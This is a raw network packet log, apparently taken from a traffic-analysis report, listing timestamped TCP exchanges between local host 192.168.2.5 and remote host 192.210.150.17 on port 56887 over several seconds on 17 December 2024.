                                                  Dec 17, 2024 16:40:20.720871925 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.720889091 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.721719027 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.721820116 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.721911907 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.722848892 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.722862959 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.723010063 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.723915100 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.724030018 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.724067926 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.724067926 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.724931002 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.725177050 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.726095915 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.726180077 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.726221085 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.726221085 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.726922035 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.727032900 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.727946043 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.728054047 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.728252888 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.728971004 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.729139090 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.730077982 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.730194092 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.730658054 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.730658054 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.731019020 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.731100082 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.731348991 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.731348991 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.732250929 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.732359886 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.733081102 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.733184099 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.733961105 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.734005928 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.734005928 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.734087944 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.734452009 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.735122919 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.735232115 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.736171961 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.736342907 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.737080097 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.737118959 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.737118959 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.737128973 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.737407923 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.737960100 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.738188028 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.738950014 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.739044905 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.739361048 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.739361048 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.740021944 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.740211010 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.741225958 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.741319895 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.742063046 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.742113113 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.742113113 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.742156982 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.742861986 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.742984056 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.743333101 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.743808031 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.743918896 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.745016098 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.745059013 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.745059013 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.745090008 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.745743990 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.745848894 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.746434927 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.746721983 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.746800900 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.746826887 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.746968985 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.747699976 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.747776031 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.748667002 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.748807907 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.749473095 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.749995947 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.750081062 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.750117064 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.750117064 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:20.750530958 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:20.799622059 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:21.145339966 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:21.264939070 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.475379944 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.518182993 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:21.721962929 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:21.725672960 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:21.841866970 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.841909885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.841967106 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.841990948 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842120886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842133999 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842278004 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842327118 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842470884 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842483044 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842595100 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842622995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842787027 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.842892885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845592976 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845669031 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845803976 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845829010 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845913887 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.845962048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.846086979 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:21.846112967 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.188190937 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.266324997 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.307868958 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386643887 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386699915 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386699915 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.386744022 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.386835098 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386882067 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.386898994 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386913061 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.386944056 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.387002945 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.387015104 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.387104034 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.387178898 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506530046 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506576061 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506589890 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506659031 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506824970 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.506905079 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.507524014 CET5688749988192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.507570028 CET4998856887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.517566919 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.565095901 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.581504107 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.582830906 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:22.701225042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701261997 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701376915 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701405048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701457977 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701486111 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701513052 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701539993 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701569080 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701728106 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701755047 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701786995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701812983 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.701899052 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702431917 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702460051 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702511072 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702538013 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702564955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702682018 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702780008 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:22.702831030 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.190601110 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:23.310480118 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.520673037 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.565083027 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:23.583935022 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:23.585083961 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:23.703835964 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.703877926 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.703932047 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.703958988 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704015970 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704042912 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704140902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704168081 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704273939 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704324007 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704372883 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704399109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704484940 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704557896 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704648018 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704770088 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.704797029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.705333948 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.705445051 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.705471992 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.705502987 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:23.705529928 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.268615961 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:24.389525890 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.775950909 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.844676018 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:24.846005917 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:24.964761972 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964783907 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964801073 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964811087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964822054 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964833975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964960098 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.964984894 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965029001 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965054035 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965118885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965178967 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965189934 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965198994 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965715885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965779066 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965831041 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.965874910 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.966008902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.966027021 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.966147900 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.966270924 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:24.966303110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.284188986 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:25.403925896 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.614192009 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.675865889 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:25.677150965 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:25.795797110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.795819998 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.795833111 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.795842886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.795851946 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.795862913 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796114922 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796128035 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796135902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796228886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796238899 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796247005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796411991 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796452999 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796844959 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.796892881 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797110081 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797127008 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797202110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797218084 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797322989 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:25.797399044 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.299832106 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:26.420300007 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.643028975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.702615023 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:26.703820944 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:26.822391033 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.822438955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.822736025 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941807985 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941857100 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941886902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941915035 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941942930 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941970110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.941998005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942025900 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942053080 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942101002 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942127943 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942154884 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942181110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942209005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942243099 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.942269087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.987870932 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.987890005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:26.987900019 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.375411034 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:27.495328903 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.706125975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.767456055 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:27.777189016 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:27.888811111 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.888830900 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889023066 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889064074 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889102936 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889169931 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889246941 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889271975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889342070 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889368057 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889460087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889472008 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889581919 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.889622927 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897593975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897674084 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897768021 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897821903 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897861958 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.897934914 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.898154020 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:27.898236990 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.388823032 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:28.508419991 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.718616962 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.794457912 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:28.796351910 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:28.915420055 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915441036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915469885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915492058 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915596962 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915699005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915802956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915859938 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915915012 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.915955067 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.916040897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.916074038 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.916177034 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.916253090 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917515039 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917565107 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917622089 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917660952 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917741060 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917798042 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:28.917896032 CET5688749987192.210.150.17192.168.2.5
